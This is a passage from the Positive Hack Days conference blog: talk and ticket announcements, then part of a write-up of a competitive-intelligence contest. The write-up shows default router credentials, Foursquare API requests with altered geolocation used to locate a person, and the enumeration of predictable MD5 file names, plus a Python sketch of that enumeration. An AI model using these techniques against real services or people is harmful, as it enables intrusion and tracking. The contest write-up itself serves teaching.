on the <a href="http://www.phdays.com/program/" target="_blank">forum program page</a>. 
The voting will help us to make the correct arrangements for meeting rooms based on their seating capacity.<br /><br />You still have the opportunity to <a href="http://www.phdays.com/how_to_join/" target="_blank">join PHDays V</a>, but do not linger — only a few tickets are left.<br /><br />See you in May!</div>Unknownnoreply@blogger.com221tag:blogger.com,1999:blog-5176771794789502609.post-58433172338872425002015-02-25T10:47:00.001+03:002015-02-25T10:47:46.466+03:00What's New in the PHDays Program: supercomputer protection, iOS security, exploit selling<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-VFKyMFZGrR4/VO19nNhuqGI/AAAAAAAAEs8/Wh_EbCh0YKk/s1600/DSC_0927.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-VFKyMFZGrR4/VO19nNhuqGI/AAAAAAAAEs8/Wh_EbCh0YKk/s1600/DSC_0927.jpg" height="424" width="640" /></a></div><br />The first stage of Call for Papers finished recently, and we'd like to announce another batch of reports that will be presented on May 26 and 27 at PHDays V (you can find the <a href="http://blog.phdays.com/2015/02/phdays-v-encryption-standards-m-in.html" target="_blank">first announcement</a> on our blog). Speakers will discuss how to improve iOS application security and what hackers find attractive about supercomputers. They will also address the relationship between sellers and buyers of zero-day vulnerability exploits.<br /><a name='more'></a><br /><b><span style="font-size: large;">Debugging automation</span></b><br /><br />Alexander Tarasenko's report is devoted to debugging automation using WinDbg. Attendees will gain skills in writing scripts using WinDbg's built-in scripting engine, as well as in Python with the Pykd extension. 
The report will be of interest to code researchers and developers of software that requires uncommon debugging tools.<br /><br /><b><span style="font-size: large;">iOS security</span></b><br /><br />Prateek Gianchandani, a member of OWASP and an information security engineer at Emirates, will lead a hands-on lab on developing exploits for iOS applications. During the demonstration, the speaker will use his own application with typical vulnerabilities. Participants will learn how to improve the security level of iOS applications at the development stage. After the introductory part, participants will try to test iOS applications by themselves.<br /><br /><b><span style="font-size: large;">On guard of supercomputers</span></b><br /><br />Felix Wilhelm and Florian Grunow from ERNW, a German infosec company, will talk about the IBM General Parallel File System, its architecture, and its vulnerabilities. The system is used in certain well-known supercomputers (such as IBM Watson), which makes it a prime target for attackers aiming at both the data stored in the file system and the system's powerful resources. The speakers will demonstrate the exploitation of two security bugs in IBM GPFS.<br /><br /><b><span style="font-size: large;">Exploit selling</span></b><br /><br />Alfonso De Gregorio, the founder of BeeWise and chief consultant at secYOUre, will speak about the relationship between sellers and buyers of zero-day vulnerability exploits and about morals in the exploit market.<br /><br /><b><span style="font-size: large;">Hash hacking at fifth gear</span></b><br /><br />Alexey Cherepanov took part in the development of John the Ripper and maintains its GUI. 
He will tell us how to speed up hash hacking by using code generation methods.<br /><br /><b><span style="font-size: large;">Fast and useful</span></b><br /><br />In addition to standard reports, the PHDays V program includes an extensive FastTrack of informative and dynamic short speeches.<br /><br />Sergey Kharkov, a specialist at the National Research Nuclear University MEPhI, will tell attendees how a GSM phone can be tapped by attacking a GSM network and substituting the base station.<br /><br />Moreover, Sylvain Pelissier, a cryptologist and a security engineer at Kudelski Security, will show how file encryption tools sometimes allow user passwords to be cracked.<br /><br />During Denis Gorchakov's presentation, the audience will learn how to prevent payment fraud. He will speak about a hardware and software system for virus analysis and the detection of botnet control centers and data collectors.<br /><br />The second stage of <a href="http://www.phdays.com/program/call_for_papers/" target="_blank">Call for Papers</a> started on February 16. 
It will last till March 31, so you still have a chance to become a speaker at PHDays this year.<br /><br />We also invite you to participate in the CFP launched by our partner, the <a href="http://conference.hitb.org/hitbsecconf2015ams/" target="_blank">HITB</a> conference.<br /><br />We look forward to seeing you at Positive Hack Days V!</div>Unknownnoreply@blogger.com234tag:blogger.com,1999:blog-5176771794789502609.post-53784246794556162772015-02-24T09:44:00.000+03:002015-02-24T09:44:49.591+03:00PHDays V: Encryption Standards, M&A in Yandex and Chemical Attacks<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ml3Vqe1W3fc/VOirwSnljmI/AAAAAAAAEro/7olTgFxwFX8/s1600/10098d24b90f899fcdff7c8d5eee594f.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ml3Vqe1W3fc/VOirwSnljmI/AAAAAAAAEro/7olTgFxwFX8/s1600/10098d24b90f899fcdff7c8d5eee594f.png" height="426" width="640" /></a></div><br />In early December, Call for Papers opened for everyone willing to speak at Positive Hack Days V. Later we announced the first speakers, introducing John Matherly, the creator of Shodan, John Bambenek, a cyber detective, and Chris Hadnagy, a professional social engineer.<br /><br />The first CFP stage ended at the end of January. Today we present a new portion of reports included in the technical, practical, and business program of the upcoming <a href="http://www.phdays.com/" target="_blank">PHDays</a>. The forum guests will learn how to fortify a corporate IT system digitally, how to bypass Moscow Metro Wi-Fi authorization, and how attackers exploit vulnerabilities in physical processes.<br /><a name='more'></a><br /><b><span style="font-size: large;">Yandex: Security for Mergers and Acquisitions</span></b><br /><br />When a company buys another company, nobody ever thinks of a security audit. 
If, by any chance, the issue does come up, only the current regulatory requirements are analyzed.<br /><br />Yandex is actively purchasing technological projects all over the world, now and then shaking up the media scene with news about another grand merger. Natalya Kukanova, an information security analyst at the search giant, will shed light on how and why they included a security audit in the merger and acquisition (M&A) process. The audience will learn what to check in M&A deals, how to organize an audit, and how to interpret its results. All points will be illustrated by real Yandex deals.<br /><br /><b><span style="font-size: large;">Encryption Standards of the Future</span></b><br /><br />Markku-Juhani Saarinen will go into detail on the NIST-sponsored CAESAR project, an international crypto competition aimed at creating a new authenticated encryption (AE) standard to replace AES-GCM (this algorithm was certified by the USA and NATO to handle secret information, but has been found to contain various security problems).<br /><br />The speaker will acquaint his audience with the CAESAR ciphers and consider the weak and strong points of the current encryption standards and algorithms in Russia (e.g. the GOST R 34.10-2001 signature algorithm).<br /><br />Markku-Juhani Saarinen has been studying information security and cryptography and developing cryptographic software for more than 15 years.<br /><br /><b><span style="font-size: large;">Around OSX Sandbox</span></b><br /><br />Alexander Stavonin will analyze how the OSX security tools (a sandbox built on TrustedBSD) work and how widely they are used by third-party applications. 
He will demonstrate potential problems and the exploitation of TrustedBSD by cybercriminals — all illustrated with source code.<br /><br /><b><span style="font-size: large;">How to Build a Digital Fortress</span></b><br /><br />Alexander Sverdlov, an information security and forensics expert from Bulgaria, will take the floor at PHDays for the third time (his workshops on cyber forensics attracted a full house in <a href="http://2013.phdays.com/program/reports/#4" target="_blank">2013</a> and <a href="http://2014.phdays.com/program/hands-on-labs/36812/" target="_blank">2014</a>) and will teach how to build an impregnable digital fortress. The audience will learn how to enhance router protection by installing alternative operating systems (Qubes OS, BSD Router project, SRG/STIG), how to stop exploits, and how to analyze application security.<br /><br /><b><span style="font-size: large;">If Hackers Were Chemists</span></b><br /><br />Researchers and cybercriminals repeatedly demonstrate ways to hack SCADA systems that control <a href="http://blog.ptsecurity.com/2014/07/what-is-so-dangerous-in-smart-grids.html" target="_blank">electricity</a>, transport, and <a href="http://blog.phdays.com/2014/06/smart-city-hacked-at-phdays-iv.html" target="_blank">critical infrastructure elements</a> such as chemical plants. However, when dealing with such facilities, information security specialists often ignore the role of physical processes.<br /><br />Such processes (e.g. a chemical reaction) can keep running despite the actions of cybercriminals with full control over an infrastructure or management system. Yet if malicious users learn to exploit physical conditions, they will be able to affect reaction and process flows. 
The consequences are alarming: it is not hard to imagine an explosion at a chemical plant caused by a hacker tampering with the temperature sensor on a tank of hazardous substance.<br /><br />Maryna Krotofil, a doctoral candidate at Hamburg University of Technology, will walk the audience through the main stages of an attack aimed at destroying a specific physical process.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-k6DN78-ptm0/VOitb6SaOQI/AAAAAAAAEr0/Oy39N7tsJKg/s1600/logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-k6DN78-ptm0/VOitb6SaOQI/AAAAAAAAEr0/Oy39N7tsJKg/s1600/logo.png" height="130" width="640" /></a></div><br />The second wave of <a href="http://www.phdays.com/program/call_for_papers/" target="_blank">Call for Papers</a> is coming soon. Don't miss your chance to speak before 3,000 participants of Positive Hack Days! The exact dates will be announced in the near future. 
Keep track of the news.<br /><br />To familiarize yourself with the issues discussed at PHDays, see our post on <a href="http://www.phdays.com/press/news/38072/" target="_blank">last year's best reports</a>.</div><br /><b><span style="font-size: large;">Tickets For PHDays V Now Available</span></b> (published 2014-12-23)<br /><br /><div dir="ltr" style="text-align: left;" trbidi="on">Ticket sales for Positive Hack Days V, the forum on practical information security, will start on Wednesday, December 23.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Errp-n8Z_6s/VJlusEykt1I/AAAAAAAAEhU/UaeQCKEk24c/s1600/new23-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Errp-n8Z_6s/VJlusEykt1I/AAAAAAAAEhU/UaeQCKEk24c/s1600/new23-12.png" height="434" width="640" /></a></div><br />A two-day ticket bought until January 12 will cost 7,337 rubles. You can register and buy a ticket on the "<a href="http://www.phdays.com/how_to_join/" target="_blank">Join the forum</a>" page.<br /><a name='more'></a><br />The Early Birds discount will be available from January 12 till February 27, 2015: a ticket will cost 9,600 rubles for two days and 7,337 rubles for one day.<br /><br />From March 2, the prices will change to 14,400 rubles for two days and 9,600 for one day.<br /><br /><b><span style="font-size: large;">Other ways to join PHDays V</span></b><br /><br />There are <a href="http://www.phdays.com/how_to_join/" target="_blank">several ways</a> to take part in the forum. First of all, you can get involved as a speaker. The first stage of accepting submissions of interesting reports on information security will last till January 30.<br /><br />You can apply for participation through the <a href="http://www.phdays.com/program/call_for_papers/" target="_blank">forum's site</a>. 
The list of the best reports presented at last year's event is available <a href="http://blog.phdays.com/2014/06/best-reports-at-phdays-iv-surveillance.html" target="_blank">here</a>.<br /><br />Moreover, anyone can win an invitation in one of the various competitions (check our <a href="http://www.phdays.com/press/news/" target="_blank">news</a> on the official website) or hold their own event as part of PHDays Everywhere. To learn more about events organized through this program in previous years, please visit the <a href="http://www.phdays.com/press/news/8141/" target="_blank">forum's site</a>.<br /><br />We look forward to seeing you at Positive Hack Days V!</div><br /><b><span style="font-size: large;">How to Speak at PHDays V</span></b> (published 2014-12-03)<br /><br /><div dir="ltr" style="text-align: left;" trbidi="on">Positive Hack Days V, the international forum on practical information security, opens its <a href="http://www.phdays.com/program/call_for_papers/" target="_blank">Call for Papers</a> on December 1. 
If you want to share your research results or have something to tell the community about, you are welcome to join the PHDays speakers on May 26 and 27, 2015.<br /><br />The forum has provided the stage for such speakers as Bruce Schneier (the legendary cryptography expert), Travis Goodspeed, Karsten Nohl, Marc "van Hauser" Heuse, Ruslan Gattarov, and Datuk Mohd Noor Amin (IMPACT, UN).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cYc50kaVV6I/VH9VkdeFIyI/AAAAAAAAEfA/4WmD_VvRR5g/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA%2B%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0%2B2014-12-03%2B%D0%B2%2B21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-cYc50kaVV6I/VH9VkdeFIyI/AAAAAAAAEfA/4WmD_VvRR5g/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA%2B%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0%2B2014-12-03%2B%D0%B2%2B21.png" height="522" width="640" /></a></div><br />Chief executives, CIOs and CISOs of the world's largest companies, information security experts, elite hackers, and representatives of the Skolkovo Foundation and government institutions are regular PHDays participants.<br /><a name='more'></a><br />The first stage lasts until January 30, 2015. Don't waste your time — the number of final talks is limited.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-YK4ukadg7nY/VH7ssDfGn9I/AAAAAAAAEec/JLIvhwnQbPs/s1600/6b6e86e8d39cb391d1ac2d4736190ec6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-YK4ukadg7nY/VH7ssDfGn9I/AAAAAAAAEec/JLIvhwnQbPs/s1600/6b6e86e8d39cb391d1ac2d4736190ec6.jpg" height="426" width="640" /></a></div><br />More than 2,500 experts from 18 countries visited PHDays IV in spring 2014. More than 3,000 participants are expected in 2015. 
It is worth studying the <a href="http://www.phdays.com/press/news/38660/" target="_blank">research</a> presented last year.<br /><br />Your honors and certificates are not what matters. What we value is a fresh approach to pressing information security issues. The <a href="http://www.phdays.com/program/review-board/" target="_blank">review board</a> accepts applications from both recognized information security experts and novice researchers.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-aSgbHt-kYn0/VH7s4prgfuI/AAAAAAAAEek/1KRShpGb-vg/s1600/3b6cd2e484c0bc8e0e1b1e5d533905a5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-aSgbHt-kYn0/VH7s4prgfuI/AAAAAAAAEek/1KRShpGb-vg/s1600/3b6cd2e484c0bc8e0e1b1e5d533905a5.jpg" height="424" width="640" /></a></div><br />Find all details about the format, participation rules, and CFP instructions on the PHDays website: <a href="http://www.phdays.com/program/call_for_papers/">http://www.phdays.com/program/call_for_papers/</a><br /><br />See you at PHDays V!<br /></div><br /><b><span style="font-size: large;">Positive Hack Days V: entering a singularity</span></b> (published 2014-11-26)<br /><br /><div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-_c1RDi696Ko/VHXLsMyu5QI/AAAAAAAAEbg/nV1n61ZL1X0/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-_c1RDi696Ko/VHXLsMyu5QI/AAAAAAAAEbg/nV1n61ZL1X0/s1600/1.png" height="427" width="640" /></a></div><br />The fifth Positive Hack Days international forum on practical information security will take place at the World Trade Center Moscow on May 26 and 27, 2015. 
The conference, organized by Positive Technologies, will bring together leading experts on cyber defense and the elite of the hacker world, representatives of state institutions and executives of large businesses, young scientists and journalists.<br /><a name='more'></a><br />More than 2,500 experts from 18 countries visited PHDays IV in 2014. The formula of PHDays remains the same: a passion for discovery, no dull advertising, unique equipment, plenty of space for experiments, professional discussion kept right to the point, informal communication between hackers and information security experts, and contests based on real-life experience.<br /><br />As in previous years, the fifth PHDays conference will bring surprises inspired by the general theme of this year's forum.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-lbioyqNJxWQ/VHXMMC566ZI/AAAAAAAAEbw/-fNJCAyE5CM/s1600/cf6ecc56ffe431b430c560ba78387fe4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-lbioyqNJxWQ/VHXMMC566ZI/AAAAAAAAEbw/-fNJCAyE5CM/s1600/cf6ecc56ffe431b430c560ba78387fe4.jpg" height="426" width="640" /></a></div><br /><b><span style="font-size: large;">The singularity is out there</span></b><br />Many present-day visionary thinkers and futurists believe that human civilization is now at a point of global change. The worldwide network has accelerated the exchange of information; the pace of scientific and technological progress can be compared with a rocket taking off. Neural networks and quantum computers, the Internet of Things and artificial intelligence, nanotechnology and bioengineering... What if all these things start working for the welfare of mankind? 
Perhaps it will be the most wonderful time in the history of humanity...<br /><br />Or, conversely, it may be the most dangerous epoch for society, when a wave of chaos comes down on the digital space and distorts the unprepared canvas of reality. In this New World, every word you say and every action you take will be stored, indexed and used against you. The boundaries of this world will be transparent for some people but turn into prison walls for others.<br /><br />Well, we are now close enough to the bifurcation point that even an insignificant influence on the complex system can cause an avalanche-like restructuring. Which scenario will we face? Is it going to be the high-tech barbarism of William Gibson's Bridge trilogy and the land of Pelevin's "zukerbrins", or the new "Noon: 22nd Century", where human civilization rises to the next level, overcoming disease and exploring other planets?<br /><br />Every night when we go to sleep we have a chance to wake up in another universe. At any time, the infinitely expanding universe may turn back and rush to the starting point. Or maybe to the finish point.<br /><br />Back to the singularity. Will we make the right choice?<br /><br /><b><span style="font-size: large;">The fifth spring will be hot</span></b><br />Over the four years, apart from wins in ratings and various awards, the forum has earned a lot of good words from professionals in the information security community.<br /><br /><i>Expert opinion:</i><br /><br /><b>Bruce Schneier,</b> a cryptography expert, Chief Security Technology Officer at British Telecom:<br /><blockquote class="tr_bq">We have been organizing security conferences for more than ten years. The major part of them are boring corporate events. However, this conference is something completely different. 
It not only inspires, it is very practical and quite counter-cultural.</blockquote><b>Marc "van Hauser" Heuse: </b><br /><blockquote class="tr_bq">I had high expectations when I came to Moscow. I thought of Russian lead hackers like having long beards, dressed fully in black, with their small laptops. Actually, it was more friendly and more open-minded. People were wearing everything from black clothes to business suits, there were a lot of students... It was a nice mix actually.</blockquote><b>Nick Galbreath: </b><br /><blockquote class="tr_bq">Defcon seems to have a competitor. And that is good.</blockquote><b>Sergey Khodakov, </b>Head of Information Security Sector at Skolkovo:<br /><blockquote class="tr_bq">PHDays gives talented teams momentum for development and for finding their way in entrepreneurship, in the white hat community. </blockquote><b>William Hagestad,</b> a military expert in cyber-intelligence:<br /><blockquote class="tr_bq">PHDays is a unique event, where we can see how information security is created and find out who is who in this field. The forum is notable due to realistic contests, such as CTF, Critical Infrastructure Attack and the contest where participants are dealing with a smart home's obstacles.</blockquote><b>geohot:</b><br /><blockquote class="tr_bq">It was fantastic and very intensive. </blockquote><b>Marc Furrer, </b>President of ComCom:<br /><blockquote class="tr_bq">It was a very good experience. PHDays is tremendously creative. Fantastic atmosphere.</blockquote><b>Yury Grin,</b> Deputy Director of ITU Telecommunication Development Bureau:<br /><blockquote class="tr_bq">PHDays-like events demonstrate how many sides information security has and what difficulties specialists from different fields of practice meet in the course of information infrastructure protection.</blockquote>Arrangements for PHDays V are in full swing. 
Positive Technologies' experts are working nights preparing technical drawings, performing analysis behind closed doors, and searching for and buying rare equipment. For now, you can check out video <a href="http://youtu.be/FOJYF61uN8c" target="_blank">compilations</a> of previous events and the <a href="http://www.phdays.com/press/news/38660/" target="_blank">reports</a> of the fourth forum, and prepare your own research, because our Call for Papers will open soon. Everyone has a chance!<br /><br /><iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/FOJYF61uN8c" width="480"></iframe> <br /><b>See you at Positive Hack Days V!</b><br /></div><br /><b><span style="font-size: large;">Review of Competitive Intelligence Tasks</span></b> (published 2014-07-16)<br /><br /><div dir="ltr" style="text-align: left;" trbidi="on">Today we'd like to talk about some practical aspects of confidential data gathering, using the tasks of the online Competitive Intelligence contest, which was held on May 15, 16 and 17.<br /><br /><a name='more'></a><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-PNo9Fo9p15s/U8YNAzo_RRI/AAAAAAAAEIM/8fwHfktuccQ/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-PNo9Fo9p15s/U8YNAzo_RRI/AAAAAAAAEIM/8fwHfktuccQ/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F1.png" /></a></div>This time the tasks were more difficult than in last year's contest. A competitive intelligence researcher needs a great number of different skills and should be able to handle various tools and plugins. 
That's why we decided to make the tasks more challenging. However, the traditional requirements for deductive thinking and the ability to find links between data still apply.<br /><br /><b><span style="font-size: large;">1. Intro</span></b><br /><br />According to the plot of the contest, a participant finds himself a new member of Anneximous, an underground gang. He is given the task of finding the email address of an ATH employee:<br /><br /><blockquote class="tr_bq">Hi, </blockquote><blockquote class="tr_bq">I heard you wanted to join the Anneximous group. That’s fine but you should prove you’re worth it. </blockquote><blockquote class="tr_bq">Rumor has it that feds are close to us. Those dumbasses from ATH (Bureau of Alcohol, Tobacco, Hackers and Cookies) must be spying on us! </blockquote><blockquote class="tr_bq">Teach one of the agents a lesson and maybe we’ll accept you. Get his email address.</blockquote>We made the first task simple so as not to scare off participants. They just needed to google it.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-6j9h_RwQa1U/U8YNRYGnT3I/AAAAAAAAEIU/lpoVgZz8xv4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-6j9h_RwQa1U/U8YNRYGnT3I/AAAAAAAAEIU/lpoVgZz8xv4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F2.png" height="268" width="640" /></a></div><br /><b>Solved by:</b> 82 participants<br /><br /><b><span style="font-size: large;">2. Reprisal against competitors</span></b><br /><br />Now the participant is assigned to gather information about hackers from World Wide Idol, who know nothing about ethics, and to turn them over to the leaders of ATH:<br /><br /><blockquote class="tr_bq">You succeeded, but that task was for kiddies. 
The point is we have been competing with a group called World White Idol for a long time. They are exceptionally bad guys without any ethics or respect for old people. It’s time to destroy those displeasing internet maniacs! </blockquote><blockquote class="tr_bq">The plan is to expose the members of this group to ATH and we’ll be alone on the throne! </blockquote><blockquote class="tr_bq">p.s. Actually, they’ve already started to hunt us<br />(http://athc.biz/docs/137b60bcec2014fcedca10cc5f89bfb4.docx), so be careful and go look for these scumbags:</blockquote><br /><b>2.1 Catching a script kiddie in Foursquare</b><br /><br /><b>Nickname:</b> Schoolkid<br /><br /><b>About</b>: The script kiddie is hacking everything he sees, not paying attention to anonymity.<br /><br /><b>Development: </b>Detected while hacking sites from the same IP address: 107.170.230.201.<br /><br /><b>Hint:</b> New info came up that the hacker is connecting from a public network. Thanks to Foursquare. Who the heck is using this thing after all?<br /><br />The script kiddie has been caught attacking from IP <b>107.170.230.201</b>. 
There we can see a wireless router with the default combination (<b>admin:admin</b>).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-AqVDzqVUSIw/U8YNwzPtGFI/AAAAAAAAEIc/oAvWTYpHRE8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-AqVDzqVUSIw/U8YNwzPtGFI/AAAAAAAAEIc/oAvWTYpHRE8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F3.png" height="450" width="640" /></a></div><br /><br />It's Rodrigez's family router located at <b>#45.647801,-84.494360</b> (http://107.170.230.201/?page=geo.cgi).<br /><br />According to clickstream data logged in the router, there were many requests sent to Foursquare services.<br /><br />In the application's requests sent to Foursquare, we change geolocation data for those data that were entered while checking in:<br /><br /><span style="font-family: Courier New, Courier, monospace;">POST /v2/users/updatelocation HTTP/1.1</span><br /><span style="font-family: Courier New, Courier, monospace;">Host: api.foursquare.com</span><br /><span style="font-family: Courier New, Courier, monospace;">ll=45.647801,-84.494360&[…]</span><br /><span style="font-family: Courier New, Courier, monospace;">GET /v2/venues/search?ll=45.647801,-84.494360&[…]HTTP/1.1</span><br /><span style="font-family: Courier New, Courier, monospace;">Host: api.foursquare.com</span><br /><br />Enter Rodrigez in the search field and find the place…<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-uhXVCIrdkoQ/U8YOZl6HmBI/AAAAAAAAEI0/WfsO8LaHVYs/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.19.36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" 
src="http://2.bp.blogspot.com/-uhXVCIrdkoQ/U8YOZl6HmBI/AAAAAAAAEI0/WfsO8LaHVYs/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.19.36.png" height="355" width="400" /></a></div><br /> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-VctNyNMKJlk/U8YOhCUlUnI/AAAAAAAAEI8/4v0VEbKgxXo/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.19.47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-VctNyNMKJlk/U8YOhCUlUnI/AAAAAAAAEI8/4v0VEbKgxXo/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.19.47.png" height="348" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /> <br />… and the hacker we were looking for—<b>Antony Kiddies</b>.<br /><br /><b>Solved by:</b> 6 participants<br /><br /><b>Points: </b>15<br /><br /><b>2.2. Looking for a Japanese businessman from WWIdol</b><br /><b><br /></b><b>Nickname: </b>Japanese Businessman<br /><br /><b>About: </b>Record of conviction: ATH case #126.<br /><br /><b>Hint:</b> ATH have a single database for the profiles of Anneximous and WWIdol. Look deeper at athc.biz. Also, check out this service for Japanese hieroglyphs recognition — <a href="http://appsv.ocrgrid.org/nhocr/">http://appsv.ocrgrid.org/nhocr/</a>.<br /><br />We have a link to this "case" and we know the number of the businessman's file that we should find. 
Obviously, we will find something useful there.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-LMSPqce125M/U8YO0aXAO9I/AAAAAAAAEJE/B9mY_yPxgEU/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.20.06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-LMSPqce125M/U8YO0aXAO9I/AAAAAAAAEJE/B9mY_yPxgEU/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+9.20.06.png" height="86" width="640" /></a></div><br />We follow the link and find out that the hash is MD5("123456.7"):<br /><br /><a href="https://www.google.ru/search?q=137b60bcec2014fcedca10cc5f89bfb4">https://www.google.ru/search?q=137b60bcec2014fcedca10cc5f89bfb4</a><br /><br />The identifier 123456.126, whose hash is d39558559e10be6b4e36ca6a5a55bf79, should take us to the person we are looking for, so the document is located at:<br /><br /><a href="http://athc.biz/docs/d39558559e10be6b4e36ca6a5a55bf79.docx">http://athc.biz/docs/d39558559e10be6b4e36ca6a5a55bf79.docx</a><br /><br />By the way, the task was inspired by the much-discussed competitive intelligence case of hacking Gartner via the address bar.<br /><br />After opening the link at athc.biz, you will find a photo of a document. 
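<br /><br />The naming scheme above, where a case file is called MD5("123456.&lt;case number&gt;"), is what lets anyone derive every other file name from one known pair. The following Python is an added example, not the contest's or athc.biz's own code: it reproduces that derivation for constructed case numbers, shows how little work recovering the number behind a given name takes, and contrasts it with the unguessable random name a defender would use instead. The prefix "123456." and the case numbers 7 and 126 come from the write-up; the size of the case-number range is an assumption.<br />

```python
"""Predictable MD5 document names versus random tokens.

Added example (not the contest's or athc.biz's own code). The ATH case
files discussed above are named md5("123456.<case number>"), so knowing
one (case number, name) pair lets anyone derive the name of every other
file. The prefix and the case numbers 7 and 126 come from the page; the
size of the case-number range searched below is an assumption.
"""
import hashlib
import secrets
import string

PREFIX = "123456."   # fixed part of the document ID, as quoted on the page


def predictable_name(case_no: int, prefix: str = PREFIX) -> str:
    """Name a case file the way the contest site did: MD5 of 'prefix<N>'."""
    return hashlib.md5(f"{prefix}{case_no}".encode("ascii")).hexdigest()


def recover_case_no(name: str, max_case: int = 100_000,
                    prefix: str = PREFIX):
    """Given one file name, find the case number that produced it.

    The candidate space is a simple counter, so the search finishes in
    well under a second. That is the weakness the task relied on: hashing
    a guessable identifier does not hide it. Returns None when nothing in
    range matches (for example, for a properly random name).
    """
    name = name.lower()
    for n in range(max_case + 1):
        if predictable_name(n, prefix) == name:
            return n
    return None


def random_name(nbytes: int = 16) -> str:
    """Hardened alternative: a 128-bit name drawn from the OS CSPRNG.

    The server keeps a table mapping the random name to the real case
    number, so a URL reveals nothing about any other document and cannot
    be enumerated by counting.
    """
    return secrets.token_hex(nbytes)


def looks_like_scheme(name: str) -> bool:
    """Both schemes yield 32 hex characters, so the format alone cannot
    tell a safe name from a guessable one; only the construction matters."""
    return len(name) == 32 and all(c in string.hexdigits for c in name)


if __name__ == "__main__":
    for case in (7, 126):
        weak = predictable_name(case)
        print(f"case {case:>4}: {weak}  -> recovered case {recover_case_no(weak)}")
    strong = random_name()
    print(f"random    : {strong}  -> recovered case {recover_case_no(strong, 10_000)}")
```
<br />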
